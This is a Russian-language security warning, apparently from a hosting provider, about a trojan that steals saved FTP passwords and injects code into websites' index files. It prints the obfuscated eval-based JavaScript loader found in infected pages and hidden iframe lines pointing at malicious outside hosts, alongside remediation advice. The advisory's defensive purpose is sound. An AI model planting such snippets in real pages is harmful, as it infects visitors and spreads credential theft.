Осторожно!!! Ломают FTP на площадках. вариант лечения.

Судя по всему, индексные файлы сайтов Вашего аккаунта (не только упомянутых) регулярно изменяются
вирусом-троянцем, использующим ваши данные для доступа FTP.
В индексные файлы добавляются строки вида:

<script>SSSS="267d262f267c277e [удалено] e7b7b7c2b";SS55S="";SSS55="function SS5SS() {S55SS=eval;SSS5S=unescape;SSSS5=String.fromCharCode;SSS5=Math.PI;S555S=parseInt;S55S5=S555S(~((SSS5&SSS5)|(~SSS5&SSS5)&(SSS5&~SSS5)|(~SSS5&~SSS5)));S555=S555S(((S55S5&S55S5)|(~S55S5&S55S5)&(S55S5&~S55S5)|(~S55S5&~S55S5))&1);SSSSS=S555<<S555;S5555=S55S5;for(SS5S=S55S5;SS5S<SSS55.length;SS5S-=-S555) S5555+=S555S(SSS55.charCodeAt(SS5S));S5555.toString();S5555%=SSS5S(0x64);for(SS555=S55S5;SS555<(SSSS.length>>SSSSS);SS555-=-S555) {S5S5S='';S5SSS='';for(S5S5=S55S5;S5S5<(S555<<SSSSS);S5S5-=-S555) if(S5S5<SSSSS) S5S5S+=SSSS.charAt(SS555*(SSSSS<<S555)+S5S5);else S5SSS+=SSSS.charAt(SS555*(S555<<SSSSS)+S5S5);SS55S+=SSSS5(SSS5S(0xFF)-S555S(SSS5S('%'+(((S555S(S5S5S,(SSSSS<<S555)<<SSSSS)^S5555)<15.5)?S55S5.toString():'')+Math.round(S555S(S5S5S,(SSSSS<<S555)<<SSSSS)^S5555).toString((SSSSS<<S555)<<SSSSS))+SSS5S('%'+(((S5555^S555S(S5SSS,SSSSS<<(S555+SSSSS)))<15.5)?S55S5.toString():'')+Math.round(S555S(S5SSS,SSSSS<<(S555+SSSSS))^S5555).toString(SSSSS<<(S555+SSSSS))),SSSSS<<(SSSSS+S555)));}try {S55SS(SS55S);} catch(e) {try{evalalert(SS55S);} catch(e) {SS5S5=S555;}try {if(SS5S5) {window.location='/';}} catch(e) {}}}SS5SS();";evalalert(SSS55);</script>

Пожалуйста, ознакомьтесь с нижеприведенными инструкциями и примите
соответствующие меры (включая смену паролей FTP):

Предупреждение о вирусе Downloader.JS.* c многочисленными модификациями и кражах паролей для FTP.

Данный тип вирусов распространяется следующим образом: вирус поражает компьютер клиента,
если тот зашел на инфицированный сайт небезопасным браузером (например, если не установлены
все последние обновления для браузера от его производителя).
После этого вирус отслеживает логины и пароли от FTP-соединений в популярных программах FTP-клиентах
(в большинстве случаев пароли передаются на сторону для использования с других IP-адресов).
А затем вирус (либо его клон с другого IP) подключается с данными логинами и паролями
по протоколу FTP и заменяет один или несколько индексных файлов на сервере,
дописывая в них свой код примерно такого содержания:
<iframe src="http://81.95.../traff/..." width=1 height=1></iframe>
Таким образом сайт инфицируется и также начинает участвовать в распространении вируса.
Вам необходимо проверить логи авторизаций в панели управления, если там только Ваши адреса,
то это означает, что Ваш компьютер заражен специальным видом троянцев, использующих
сохраненные FTP-пароли (в популярных FTP-клиентах) для изменения файлов на FTP-сервере.
Изменения файлов в частности включают в себя добавление в конец (начало, после тега body и т.п.)
индексного файла строки вида:
<!-- ~ --><iframe width="0" height="0" src="http://www.mdfc.info"></iframe><!-- ~ -->
Соответственно, http://www.mdfc.info это взломанный сайт либо сайт злоумышленников,
который вместо заглавной страницы выдает код вируса.

Советуем проверить Ваши компьютеры обновленными антивирусами и программами поиска троянских программ.
После этого необходимо изменить пароли FTP и заменить индексные файлы (index*.*, либо указанные в настройках)
на оригинальные либо сообщить нам, можем по запросу с контактного адреса аккаунта восстановить
данные из бекапа (до 2 недель давности). В случае, если в резервных копиях сохранены зараженные копии,
можем произвести поиск и чистку файлов от вирусного кода.
Попутно несколько ссылок:
http://vitafil.habrahabr.ru/blog/8158.html
http://www.host.ru/news/2007/03/19.html
http://www.viruslist.com/ru/viruses/encyclopedia?virusid=135929